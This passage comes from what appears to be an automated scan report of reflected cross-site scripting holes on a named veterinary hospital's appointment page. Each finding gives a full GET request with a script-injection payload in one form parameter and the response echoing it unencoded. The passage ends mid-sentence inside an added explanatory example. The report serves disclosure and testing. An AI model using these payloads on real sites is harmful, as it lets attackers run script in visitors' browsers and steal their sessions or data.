%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%25
3b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:26 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=5is2j95h7bmhkpu54r12irmp05; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
ls.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=9e691"><script>alert(1)</script>d26f4a4d140&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fww
...[SNIP]...

2.106. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [other parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the other request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a872"><script>alert(1)</script>e5865d0001d was submitted in the other parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=7a872"><script>alert(1)</script>e5865d0001d&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%25
3b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:30 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=3iaem1hmp6hv9mq27eu3sdqt14; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="other" id="other" type="text" size="40" class="req" maxlength="255" value="7a872"><script>alert(1)</script>e5865d0001d" />
...[SNIP]...

2.107. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [petage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the petage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5494"><script>alert(1)</script>954e538de19 was submitted in the petage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=f5494"><script>alert(1)</script>954e538de19&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%25
3b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:34 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=rck5nv710n6smmo8j1o5au3gj1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="petage" id="petage" type="text" size="15" maxlength="50" value="f5494"><script>alert(1)</script>954e538de19" />
...[SNIP]...

2.108. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [petname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the petname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f62a9"><script>alert(1)</script>48aa8f098b1 was submitted in the petname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=f62a9"><script>alert(1)</script>48aa8f098b1&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%25
3b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:39 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=d24coc2ad0oa7sgdfpbfikjlv2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="petname" id="petname" type="text" size="20" maxlength="50" value="f62a9"><script>alert(1)</script>48aa8f098b1" />
...[SNIP]...

2.109. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [pettype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the pettype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37f7f"><script>alert(1)</script>e984da2d97e was submitted in the pettype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=37f7f"><script>alert(1)</script>e984da2d97e&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%25
3b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:44 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=dqg12p4d53qnj55akadef34au0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
al/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=37f7f"><script>alert(1)</script>e984da2d97e&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-vet
...[SNIP]...

2.110. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [phone parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d23b"><script>alert(1)</script>c192c8c7378 was submitted in the phone parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=8d23b"><script>alert(1)</script>c192c8c7378&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%25
3b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:49 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=1ulacnh0hcc7s695g9fao52rn6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="phone" id="phone" type="text" size="30" maxlength="20" value="8d23b"><script>alert(1)</script>c192c8c7378" />
...[SNIP]...

2.111. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [reason parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the reason request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32c7e"><script>alert(1)</script>90a0eb32c87 was submitted in the reason parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=32c7e"><script>alert(1)</script>90a0eb32c87&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%25
3b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:53 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=2fopkg0805iekeqe17d0m8pkk2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
tphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=32c7e"><script>alert(1)</script>90a0eb32c87&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospita
...[SNIP]...
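Worked example for findings 2.103 through 2.112 above. This is added illustration, not part of the XSS.CX report and not code from vcahospitals.com (the site runs PHP per its Server and X-Powered-By headers; its source is not on this page). The response snippets show two reflection contexts on appt.html: the text inputs echo their own parameter into value="..." (lname, other, petage, petname, phone), and a hidden uri input echoes the entire request URI, query string included, which is why the optin, pettype and reason values and even an arbitrary parameter name (2.104) come back unencoded. The two render functions below are an assumed reconstruction of that behaviour from the snippets; the trimmed query string, the function names and the check itself are constructed for this example. The check is the test that separates "echoed" from "exploitable": the canary must appear verbatim, inside a double-quoted attribute of an open tag, so that 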